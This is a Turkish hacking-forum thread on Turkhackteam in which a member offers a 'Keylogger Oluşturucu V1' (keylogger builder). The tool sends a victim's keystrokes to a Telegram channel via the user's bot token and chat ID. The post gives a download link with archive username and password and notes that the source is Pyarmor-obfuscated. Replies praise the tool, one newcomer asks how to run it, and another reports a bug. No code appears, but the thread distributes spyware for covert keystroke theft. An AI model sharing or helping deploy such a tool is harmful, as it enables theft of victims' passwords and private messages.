# Keylogger Oluşturucu V1 #

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,024
1,053
16
Konya Ovası Askeri Tesislerinde
Bir şeyler test ederken bu şekilde bir araç çıktı.
m5oq1x6.jpg

Telegram Api Bot Token ve Chat Id nizi girdikten sonra oraya kullanıcın bastığı tuşlar o kanala gönderilecektir.

90epd0w.jpg

İndirme Linki
Kullanıcı Adı: TurkHackTeam
Şifre: KeyloggerV1

Virüs Total

Not: Pyarmor kütüphanesini kurunuz + Source-code şifreli reverse etmek isteyen edebilir.

A ben A keylogger Güzel olmuş kral eline sağlık

GatosAll

Yeni üye
1 Nis 2023
6
4
m5oq1x6.jpg

Telegram Api Bot Token ve Chat Id nizi girdikten sonra oraya kullanıcın bastığı tuşlar o kanala gönderilecektir.

90epd0w.jpg

İndirme Linki

Virüs Total

Not: Pyarmor kütüphanesini kurunuz + Source-code şifreli reverse etmek isteyen edebilir.

merhaba ben dosyayı indirdim ama üstte gösterildiği gibi bir keylogger yazısı çıkmıyor ve pyrmor yazan dosyayıda açamıyorum microsoft storda boş bir sekmeye atıyor beni. python gibi bir şey mi indirmem lazım?

TurkGokay

Uzman üye
4 Ara 2022
1,020
544
Kemalizm
m5oq1x6.jpg

90epd0w.jpg

İndirme Linki

Virüs Total

Ellerine sağlık, güzel bir tool. Bunu kullanabilirim.

Fred18

Katılımcı Üye
6 Ağu 2011
255
6
BakÜ
Ustat ellerine saglik,
Ancak Virustotal gordum, niye her yaptiginiz isi antivirus programlari ile paylasiyorsunuz?
zaten keylogger - adindan gorundugu gibi virus.eziyyetle is yapip, onu virustotala al bak tum kodara demeginiz dogru deyil.
Denedim.

ChatID nasil bulacagimizi yazmamisiniz, telegram bot uzmani oldugum icin problem cikmadi.
Proje henuz demo asamasinda diye bilirim. bot-a .txt gonderdiginde txt icerigi tam deyil.
selam - yazdigimizda

s
e
l
a
M

gibi yaziyor. hic iyi deyil.

Son düzenleme:

harasad

Katılımcı Üye
14 Eyl 2023
307
106
m5oq1x6.jpg

90epd0w.jpg

İndirme Linki

Virüs Total

Eline sağlık

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.